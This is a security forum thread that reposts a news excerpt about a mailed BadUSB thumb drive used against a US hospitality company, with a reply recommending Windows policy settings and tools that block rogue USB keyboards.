Rare BadUSB attack detected in the wild against US hospitality provider

silversurfer

silversurfer

Level 85
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Malware Hunter
Well-known
Aug 17, 2014
10,176
Content source
https://www.zdnet.com/article/rare-badusb-attack-detected-in-the-wild-against-us-hospitality-provider/
Hackers use snail-mail to send target company an envelope with a malware-laced USB thumb drive.

A US hospitality provider has recently been the target of an incredibly rare BadUSB attack, ZDNet has learned from cyber-security firm Trustwave.

The attack happened after the company received an envelope containing a fake BestBuy gift card, along with a USB thumb drive.

The receiving company was told to plug the USB thumb drive into a computer to access a list of items the gift card could be used for.

But in reality, the USB thumb drive was what security experts call a "BadUSB" -- a USB thumb drive that actually functions as a keyboard when connected to a computer, where it emulates keypresses to launch various automated attacks.

Trustwave, who couldn't reveal the target company's name for confidentiality reasons, said the victim recognized the attempted hack and called it in to investigate the incident.

In a report published today and shared with ZDNet, Trustwave said that once they plugged the BadUSB into a test workstation, the BadUSB triggered a series of automated keypresses that launched a PowerShell command.This Powershell command downloaded a bulkier PowerShell script from an internet site and then installed malware on the test machine -- a JScript-based bot.
Click to expand...
 
  • Like
  • +Reputation
  • Wow
Reactions: Protomartyr, shmu26, stefanos and 6 others
H

HarborFront

Level 71
Verified
Top Poster
Content Creator
Oct 9, 2016
6,033
You can prevent BadUSB in WIn10 Pro by editing in Local Group Policy Editor following the steps below

heimdalsecurity.com

How to Fix the Critical BadUSB Security Flaw in Less than 10 Minutes

BadUSB exploit is considered one of the worst IT vulnerabilities ever found. Luckily, you can stay safe with a few simple steps you can follow in your Windows operating system.
heimdalsecurity.com heimdalsecurity.com

Alternatively, HMPA also has a a feature to prevent BadUSB. Similarly, using G-DATA's USB Keyboard Guard from below

USB Keyboard Guard | Reliable protection against manipulated USB stick | G DATA

Protect your PC and your data against BadUSB by using USB Keyboard Guard by G DATA - irrespective of your antivirus program. Download it for free now.
www.gdata-software.com www.gdata-software.com
 
  • Like
  • +Reputation
  • Thanks
Reactions: Protomartyr, stefanos, upnorth and 4 others
You must log in or register to reply here.

Similar threads

H
    • +Reputation
    • Like
    • Thanks
Guide | How To A Comprehensive Protection of USB Ports/Devices
Replies
8
Views
2,482
Guides - Privacy & Security Tips
simmerskool
simmerskool
SpyNetGirl
    • Like
    • +Reputation
    • Hundred Points
Harden Windows Security | Only with official documented methods | Always up to date
Replies
75
Views
10,393
Other security for Windows, Mac, Linux
Warencom
W
Exterminator
    • Like
  • Locked
There Is Anti-BadUSB Protection, but It's a Bit Sticky
Replies
0
Views
2,007
News Archive
Exterminator
Exterminator

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

Quick Navigation

Forum Rules Warning System Welcome Guide Two-factor Authentication

User Menu

Login

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top